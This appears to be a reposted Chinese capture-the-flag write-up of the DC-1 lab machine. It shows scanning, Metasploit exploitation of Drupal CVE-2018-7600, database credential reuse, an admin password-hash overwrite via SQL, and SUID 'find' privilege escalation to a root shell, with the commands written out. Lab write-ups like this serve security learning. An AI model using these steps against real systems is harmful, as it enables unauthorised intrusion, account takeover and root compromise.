本文共 1296 字,大约阅读时间需要 4 分钟。
DC靶机的内网渗透,简介里说我们要找出5个flge就算通关了
靶场启动后我们内网扫一波找出靶机的ip地址,这里我们用nmap扫。
端口扫描: 这里我们访问一下开放的80端口: 在百度搜索drupal存在远程代码执行漏洞这里我们直接用msf进行复现:
search CVE-2018-7600 搜索复现模块 use 模块路径 show options set RHOST 目标ip run 查看一下当前的用户权限:这里我们就在当前位置到到了第一个flag 查看第一个文件提示: 这里我们就找找cms的配置文件,并打开他。 这里我们就找到了第二个flag 这意思应该是要让我们提权,但是没思路,但是看到了数据库的账号密码可以连接试试。 试了几次发现登不上,去看了看别个做的,发现要先获取一个python的标准shellwhoaml
获取标准shell后就成功登上了mysql。 接下来查看当前数据库python -c “import pty;pty.spawn(’/bin/bash’)”
show databases; //查看所有数据库show tables; //查表再进入数据库查表: 看见一个user表看看里面的数据:
select * from 表名;查看到了账号密码看能不能替换了,但是他的密码是经过加密的用了该cms特有的hash算法。接下来找hash加密文件。 把加密下来的密码复制现在替换掉数据库里面的密码
update users set pass="$S$DsilJYj0DZUjqVvQBVt72POhIUf/Wh9rj1f6pjDrznjcfhJLzJ29" where name="admin";
修改后直接登录。
可以在这里面发现flag3: flag4就在home目录里,打开就行了。 这里的提示大概就是线索在root目录里面但是没有权限。 果然没有,这里就需要提权了。我这里使用suid提权。 已知的可用来提权的linux可行性的文件列表如下:Nmap
Vim find Bash More Less Nano cp
以下命令可以发现系统上运行的所有SUID可执行文件。
#以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令,一个一个试find / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000-print2>/dev/nullfind / -user root -perm -4000-exec ls -ldb { } \
我们来查看是root权限运行的文件:
发现能利用的只有/usr/bin/find,确认一下是不是root权限运行。ls -lh /usr/bin/find
确认是root权限后执行以下命令;
find ./ aaa -exec '/bin/sh' \;
获取root权限后就可以打开root文件里找到最后一个flga了。
结束!!!!!!转载地址:http://haywi.baihongyu.com/